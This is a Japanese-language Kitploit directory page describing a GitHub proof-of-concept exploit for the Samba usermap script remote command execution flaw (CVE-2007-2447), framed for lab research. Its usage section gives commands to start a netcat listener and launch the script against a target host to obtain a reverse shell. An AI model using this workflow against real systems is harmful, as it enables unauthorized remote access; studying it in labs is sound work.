Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2007-2447 — Samba usermapスクリプトリモートコマンド実行 (CVE-2007-2447) の概念実証エクスプロイト。制御されたラボテストとセキュリティ研究のためのリバースシェル機能付き。 | Kitploit
ツール/GitHubGitHub/abdulsaabir/cve-2007-2447
ペイロード生成脆弱性分析エクスプロイトペネトレーションテストコマンド&コントロール学習と教育リモートアクセスツール
GitHubabdulsaabir/cve-2007-2447

CVE-2007-2447

Samba usermapスクリプトリモートコマンド実行 (CVE-2007-2447) の概念実証エクスプロイト。制御されたラボテストとセキュリティ研究のためのリバースシェル機能付き。

リポジトリを見る
128ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2007-2447

PoC: Sambaの「usermap script」によるリモートコマンド実行(歴史的なCVE)。このリポジトリには、研究および教育目的のレビュー用の小さな概念実証スクリプトが含まれています。主要なスクリプトは usermap_script_Command_Execution.py です。

参考記事: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

使用法

リポジトリをクローンし、管理されたラボ環境でスクリプトを実行してください。このPoCは任意で LHOST:LPORT へのリバースシェルを使用します。スクリプトを実行する前にリスナーを起動し、依存関係がインストールされていることを確認してください(インストールを参照)。

root@kitploit:~
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>

パラメータ

  • RHOST — ターゲットのIPアドレスまたはホスト名
  • RPORT — ターゲットのTCPポート(通常は 139)
  • LHOST — リバース接続用のリスナーIP
  • LPORT — リスナーポート

インストール

推奨:スクリプトを実行する前に、分離されたPython仮想環境を作成し、requirements.txt から依存関係をインストールしてください。

root@kitploit:~
python3 -m venv exploit_env
source exploit_env/bin/activate
pip install -r requirements.txt

安全上の注意と免責事項

このコードは、正当なセキュリティ研究、教育、および防御的テストのためだけに提供されています。所有しているシステム、または明示的な書面によるテスト許可を得たシステム以外に対して、このスクリプトを実行しないでください。誤用は法的結果を招く可能性があります。リポジトリ所有者は誤用について責任を負いません。

潜在的に危険なコードを分析する際は、常に静的コードレビューと管理されたラボテスト(VMスナップショット、隔離されたネットワーク、パケットキャプチャ)を優先してください。

実行不可能な注釈付きウォークスルーまたは requirements.txt が必要な場合は、Issueを開くか、ここでリクエストしてください。

ツールをダウンロード